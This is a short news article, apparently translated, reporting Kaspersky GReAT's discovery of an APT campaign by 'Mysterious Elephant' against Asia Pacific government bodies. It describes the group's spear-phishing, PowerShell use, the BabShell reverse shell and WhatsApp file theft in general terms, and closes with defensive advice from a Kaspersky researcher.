Kaspersky Reveals APT Mysterious Elephant Targets Asia Pacific Government

Illustration (photo: Freepic)

JAKARTA - In early 2025, the Kaspersky Global Research and Analysis Team (GReAT) identified a new campaign by APT Mysterious Elephant, which targets government entities and foreign affairs organizations across the Asia Pacific region.

The strike group aims to steal very sensitive information, including documents, images, and archival files, with WhatsApp data targeted for exfiltration.

They use a combination of exploit kits, personalized spear-phishing emails, and malicious documents, adjusting each attack to specific victims to gain initial access.

Once inside the network, threat actors use various tools and techniques to increase privileges, move laterally, and explore sensitive data.

The PowerShell script forms the operational foundation of Mysterious Elephant, allows the group to execute commands, deploy additional malware, and maintain persistence in compromised systems.

One of the main tools in the group's arsenal is BabShell, a reverse shell that gives attackers direct access to infected machines.

After being executed, this tool collects important system information including usernames, computer names, and MAC addresses to identify targets uniquely.

This campaign is especially well known for its focus on WhatsApp data theft. The attackers have developed a special module capable of extracting files shared through the application, including sensitive documents, photos, and archives.

"Organizations must implement effective countermeasures very important to reduce the risk of successful attacks and protect sensitive information from falling into the wrong hands," said Noushin Shabab, head of security research at Kaspersky GReAT.

He also emphasized that organizations are required to implement strong security measures, including regular software updates, network monitoring, and employee training.